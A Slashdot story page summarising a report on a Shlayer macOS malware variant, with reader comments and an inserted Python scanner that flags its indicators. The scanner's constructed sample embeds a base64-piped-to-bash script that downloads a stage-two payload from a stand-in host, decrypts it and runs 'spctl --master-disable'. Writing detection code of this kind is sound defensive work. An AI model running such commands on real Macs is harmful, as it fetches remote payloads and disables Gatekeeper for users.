OS X Desktops (Apple) Operating Systems Security Software Technology

Shlayer Malware Disables macOS Gatekeeper To Run Unsigned Payloads (bleepingcomputer.com)

A new variant of the multi-stage Shlayer malware known to target macOS users has been observed in the wild, now capable of escalating privileges using a two-year-old technique and of disabling the Gatekeeper protection mechanism to run unsigned second-stage payloads. Bleeping Computer reports: This new Shlayer variant unearthed by Carbon Black's Threat Analysis Unit (TAU) targets all macOS releases up to the latest 10.14.3 Mojave, and arrives on the targets' machines as DMG, PKG, ISO, or ZIP files, some of them also signed with a valid Apple developer ID to make them look legitimate. Shlayer samples found by TAU also use malicious shell scripts to download additional payloads, just like older installments did, and, in the case of samples distributed as DMG images, will surreptitiously launch a .command script in the background after the user launches the fake Flash installer. The malicious script included in the DMG is encoded using base64 and will decrypt a second, AES-encrypted script, which is executed automatically after being decrypted.

Once it successfully downloads the second-stage malware payload, Shlayer will attempt "to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline," as presented by Patrick Wardle in his Death by 1000 Installers talk at DEFCON 2017. The next step is to download extra payloads, which according to TAU all contain adware, and it makes sure they'll be able to run on the compromised Mac by disabling the Gatekeeper protection mechanism. After this is accomplished, all extra payloads downloaded and launched by Shlayer will be seen as whitelisted software, because the OS will no longer check whether they are signed with an Apple developer ID. Also, just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second-stage payloads are also signed with valid developer IDs.
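As an added example, not code from Bleeping Computer or Carbon Black's write-up, here is a small Python scanner that decodes the base64 blobs in a downloaded .command script and flags the behaviours the summary describes (AES-decrypted second stage, security_authtrampoline, Gatekeeper tampering, extra downloads). The Gatekeeper and quarantine command strings, the sample script and its URL are assumptions, not values taken from a real sample.

```python
import base64
import re

# Indicator strings and why each matters. The security_authtrampoline and AES
# indicators come from the summary above; the spctl/xattr commands are assumed
# ways a script would weaken Gatekeeper, not strings quoted from Shlayer itself.
SUSPICIOUS = {
    "security_authtrampoline": "sudo privilege-escalation trick (Wardle, DEFCON 2017)",
    "spctl --master-disable": "Gatekeeper disabled system-wide (assumed command)",
    "xattr -d com.apple.quarantine": "quarantine attribute stripped (assumed command)",
    "openssl enc -d -aes": "AES-encrypted second-stage script being decrypted",
    "curl ": "additional payload download",
}

# Base64 runs long enough to hide a script rather than a short token.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_blobs(text):
    """Return the decoded text of every base64 blob in the script (one layer deep)."""
    decoded = []
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:          # not valid base64 after all (e.g. a long hash)
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def scan_script(text):
    """Return [(indicator, description)] found in the script or its decoded blobs."""
    hits = []
    for layer in [text] + decode_base64_blobs(text):
        for needle, why in SUSPICIOUS.items():
            if needle in layer and (needle, why) not in hits:
                hits.append((needle, why))
    return hits


# Constructed sample mimicking the described .command wrapper; not a real sample.
INNER_SCRIPT = (
    "#!/bin/bash\n"
    "curl -s http://stage2.example.invalid/payload -o /tmp/s2.enc\n"
    "openssl enc -d -aes-256-cbc -in /tmp/s2.enc -out /tmp/s2.sh -k <key>\n"
    "# second stage uses /usr/libexec/security_authtrampoline <args>\n"
    "spctl --master-disable\n"
)
SAMPLE_COMMAND = "#!/bin/bash\necho %s | base64 --decode | bash\n" % (
    base64.b64encode(INNER_SCRIPT.encode()).decode())

if __name__ == "__main__":
    for needle, why in scan_script(SAMPLE_COMMAND):
        print("%-32s %s" % (needle, why))
```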

  • Also, just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second stage payloads are also signed with valid developer IDs.

    So, this would infect people even if Apple fixes the bug right? The fact they can side step checks using signed code is a big deal by itself.

    I'm guessing those devel's got cracked, and have some work ahead of them...

    • by Anonymous Coward

      If it uses sudo to escalate privileges, feels to me the right thing is to uninstall sudo (can you in a mac?) and stick with su if root access is dearly needed.

    • So, this would infect people even if Apple fixes the bug right?

      I believe the 2017 security_authtrampoline issue was patched quite some time ago. Assuming that’s the case, this would require some additional social engineering to work. However, as we’ve seen many times before, people are almost always the weakest link in the security chain - so...

      • by Anonymous Coward

        It was fixed after Wardle reported it to Apple, more than a year ago. Macs are protected if they are running the current 10.12 (Sierra), 10.13 (High Sierra), or 10.14 (Mojave).

    • by Jeremi ( 14640 )

      Presumably Apple will be blacklisting the compromised developer IDs in the very near future, if they haven't done so already.

      • Won't help most people who were dumb enough to run this program. You have to a) choose to pirate security software via bittorrent, b) not notice the version number is years out-of-date, and c) not realize the executable code in the files you downloaded is actually Windows code. Adding d) click the "run non-signed software" button is not gonna be terribly useful.

  • by Anonymous Coward

    Just download this executable to secure your mac: Antivirus (badguysite.org/install-malware.dmg)

  • I don't know what Apple can do about something like this. A valid dev ID can allow software to run as root with full root privs. The only way I can see Apple fixing this is moving the Gatekeeper options to the same place where one sets the T2 boot security via recovery mode, where it is inaccessible in the normal OS.

    (IIRC) Ages ago, Sprint required signed code on all their smartphones (this was pre-iPhone, and smartphones were a different type of device than PDA-phones, so they had mainly Windows Mobile o

    • by guruevi ( 827432 )

      In many cases these certs are gotten by posing as a legitimate developer to Apple and then signing malware with it. They actually pay the $99, often with a stolen credit card and will even publish "legitimate" apps (often rebranded/recompiled crap) before starting a campaign.

    • by AHuxley ( 892839 )

      All the extra payloads that have to be downloaded are the only tell, as the "software" is trusted/approved by the OS.

  • by Anonymous Coward

    People just bypass the sandbox anyway since many freely available packages aren't signed.
